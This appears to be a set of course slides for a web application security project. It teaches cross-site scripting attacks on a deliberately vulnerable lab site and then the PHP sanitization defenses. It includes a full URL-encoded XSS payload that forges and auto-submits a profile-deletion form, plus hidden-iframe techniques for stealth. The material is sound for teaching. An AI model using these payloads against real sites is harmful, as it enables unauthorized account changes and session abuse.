1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006

Page 1

Project 2: Web App Security

Collin Jackson

CS 155 Spring 2006

Page 2

Deadlines

Page 3

Part 1

Attacks

Page 4

Overview

• Explore several attack types
• Requires both effectiveness and stealth

Learn:
• How an attacker can evade sanitization
• Consequences of an exploit
• JavaScript
• Very basic CSS

Page 5

Attacks

Attack A: Cookie Theft
• Use URL encoding
• Could hijack session

Attack B: Silent Transfer
• Navigate browser
• Use iframes, forms

Attack C: Login Snooping
• Evade sanitization
• Handle DOM events

Attack D: Profile Worm
• Confuse site scripts
• Replicate

[Diagram: flows between zoobar.org, badguy.com and stanford.edu; labels: link, email, form, redirect]

Page 6

JavaScript

• Browser scripting language with C-like syntax
• Sandboxed, garbage collected
• Closures

  function makeClosure() {   // y keeps access to x after makeClosure returns
    var x = 3;
    var y = function() { alert(x); };
    return y;
  }

• Encapsulation/objects

  function X() { this.y = 3; }
  var z = new X();
  alert(z.y);

• Can interpret data as code (eval)
• Browser-dependent

Page 7

Invoking JavaScript

Tags:
  <script>alert('Hello world!')</script>

Links:
  javascript:alert('Hello world!')
  Wrap code in "void" if it has a return value

Event handlers:
  <form onsubmit="alert('Hello world!')">
  <iframe onload="alert('Hello world!')">

CSS (IE only):
  <style>body { background: url(javascript:alert('Hello world!')); }</style>

Page 8

DOM Manipulation Examples

document.getElementById(id)
document.getElementsByTagName(tag)
document.write(htmltext)
document.createElement(tagname)
document.body.appendChild(node)
document.forms[index].fieldname.value = …
document.formname.fieldname.value = …
frame.contentDocument.getElementById(id)

Page 9

Arrays and Loops

Example: Change href of all links on a page

var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) {
  var link = links[i];
  link.href = "javascript:alert('Sorry!');";
}

Page 10

Other Useful Functions

Navigation
  document.location
  document.formname.submit()
  document.forms[0].submitfield.click()

Delayed Events
  node.addEventListener(eventname, handler, useCapture)
  node.removeEventListener(eventname, handler, useCapture)
  window.setTimeout(handler, milliseconds)

Page 11

Stealthy Styles

var node = document.getElementById("mynodeid");
node.style.display = 'none';        // may not load at all
node.style.visibility = 'hidden';   // still takes up space
node.style.position = 'absolute';   // not included in flow

// can also write CSS rules to page
document.write("<style>#mynodeid { visibility:hidden; }</style>");

Page 12

Example: Profile Deleter

• Malicious hyperlink deletes profile of user who clicks it
• Only works when user logged in
  • User might have multiple tabs open
  • Might have chosen/forgotten not to log out
  • Might appear in another user's profile
• Uses vulnerability in users.php from Attack A
• Constructs profile deletion form and submits it


Page 13

Find vulnerability
• Site reflects query parameter in input field
• Link can include anything we want here

Page 14

Copy form data
• View source to find form fields
• Create copycat form with our modifications

Page 15

• Close previous <input>, <form>
• Button click triggers form submit
• URL encode

Page 16

Debugging
• Check error
• It didn't work. Open JavaScript console
• "Undefined": no properties!
• Two forms with same name

Page 17

Now with correct form
• Fixed version

Page 18

Final Test
• users.php replaced with index.php
• Profile deleted

http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E

Page 19

Stealthier approaches

Post form into hidden iframe:
  <form name=F action=/index.php target=myframe>…
  <iframe name=myframe style="visibility:hidden">…

Open page with form in hidden iframe:
  <iframe name=myframe style="visibility:hidden">…
  <script>document.myframe.contentDocument.forms[0].profile_update.value = "";</script>

Page 20

Part 2

Defenses

Page 21

Goals

Learn:
• How easy it is to make mistakes
• That even simple code can be hard to secure
• Techniques for appropriate input validation
• PHP
• Very basic SQL

A little programming knowledge can be a dangerous thing

Page 22

PHP: Hypertext Preprocessor

• Server scripting language with C-like syntax
• Can intermingle static HTML and code
  <input value=<?php echo $myvalue; ?>>
• Encapsulation/objects
  class X { var $y = 3; }
  $z = new X();
  echo $z->y;
• Can embed variables in double-quote strings
  $user = "world"; echo "Hello $user!";
  or
  $user = "world"; echo "Hello " . $user . "!";
• Form data in global arrays $_GET, $_POST, …

Page 23

SQL

• Widely used database query language
• Fetch a set of records
  SELECT * FROM Person WHERE Username='grader'
• Add data to the table
  INSERT INTO Person (Username, Zoobars) VALUES ('grader', 10)
• Modify data
  UPDATE Person SET Zoobars=42 WHERE PersonID=5
• Query syntax (mostly) independent of vendor

Page 24

File structure

index.php
users.php
transfer.php
login.php
includes/
  auth.php (cookie authentication)
  common.php (includes everything else)
  navigation.php (site template)
db/
  zoobar/
    Person.txt (must be writable by web server)
Includes /usr/class/cs155/projects/pp2/txt-db-api/…

Only edit these files

Page 25

txt-db-api

• Third-party text file database library
• Data can be int, string, and autoincrement
• Need to escape strings: \' \" \\
• Actually magic_quotes_gpc does this for us

$recipient = $_POST['recipient']; // already escaped
$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
$rs = $db->executeQuery($sql);
if ($rs->next())
    $id = $rs->getCurrentValueByName('PersonID');

Page 26

Defenses to Part 1

• Attack A: Cookie Theft
• Attack B: Silent Transfer
• Attack C: Login Snooping
• Attack D: Profile Worm

Page 27

Sanitization Techniques

addslashes(string)
  Already done by magic_quotes_gpc
  Inverse: stripslashes(string)
htmlspecialchars(string [, quote_style])
  Converts & < > " to HTML entities
  Use ENT_QUOTES to change ' to &#039;
strip_tags(string [, allowable_tags])
  Max tag length 1024
  Does not sanitize tag properties
preg_replace(pattern, replacement, subject)
More info: http://php.net

Page 28

More XSS hunting

• Look for untrusted input used as output
  • Note sanitization already applied to each variable
  • Form data has magic_quotes_gpc, db data does not
• Determine browser context for output
  • Inside a quoted string within a tag: worry about ' "
  • Outside a tag: worry about < >
  • Input to eval: very dangerous
• Sanitize the output if necessary
  • No penalty for erring on the side of caution
  • But sanitizing multiple times may lead to problems
• No credit for solving non-goals: SQL injection, etc.
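An added example (not from the slides or the project's zoobar code) that puts the Sanitization Techniques functions and the three output contexts of the slide above together: the reflected <input> value from users.php, a text node holding db data, and a SQL literal, each escaped exactly once at its own sink and with magic_quotes_gpc accounted for. Function names, the input string and the Person/Username columns are assumptions for illustration.

```php
<?php
// Added example for CS 155 Project 2 (not project code): escape once, per sink,
// according to the browser or SQL context the value lands in.

// The slides' vulnerable pattern: unquoted attribute, no escaping, so a value
// containing a quote or '>' terminates the attribute and starts new markup.
function render_user_field_vulnerable($user) {
    return "<input name=user value=$user>";
}

// magic_quotes_gpc (on in the 2006 project setup) adds backslashes to form
// data for SQL; undo that before HTML output or the backslashes show up on
// the page (the "sanitizing multiple times" problem). Guarded so it also runs
// on PHP 8, where the function no longer exists.
function unquote_gpc($s) {
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        return stripslashes($s);
    }
    return $s;
}

// Context: inside a quoted attribute. Quote the attribute and convert & < > " '
// with ENT_QUOTES so neither quote kind nor a new tag can close it.
function render_user_field($user) {
    $safe = htmlspecialchars(unquote_gpc($user), ENT_QUOTES, 'UTF-8');
    return '<input name="user" value="' . $safe . '">';
}

// Context: outside a tag (text node). < and > are what matter; ENT_QUOTES is
// harmless here, so the same call is used rather than a weaker one.
// db data has NOT been through magic_quotes_gpc, so no stripslashes.
function render_profile_text($profile) {
    return '<p>' . htmlspecialchars($profile, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Context: SQL string literal. addslashes only if magic_quotes_gpc has not
// already done it (the slides' "already escaped" case), never both.
function person_lookup_sql($recipient) {
    $escaped = (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc())
        ? $recipient : addslashes($recipient);
    return "SELECT PersonID FROM Person WHERE Username='$escaped'";
}

// Constructed input of the kind slide 13 describes: a closing quote and a tag.
$input = '"><b>x</b>';
echo render_user_field_vulnerable($input), "\n";   // tag escapes the attribute
echo render_user_field($input), "\n";              // stays inside value="..."
echo render_profile_text("<b>db text</b>"), "\n";  // shown literally, not bold
echo person_lookup_sql("O'Brien"), "\n";           // quote escaped for SQL
```

Run with the command-line interpreter (php example.php) to compare the vulnerable and escaped outputs side by side.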

Page 29

Good luck!

• Start early
• Ask questions
• Be creative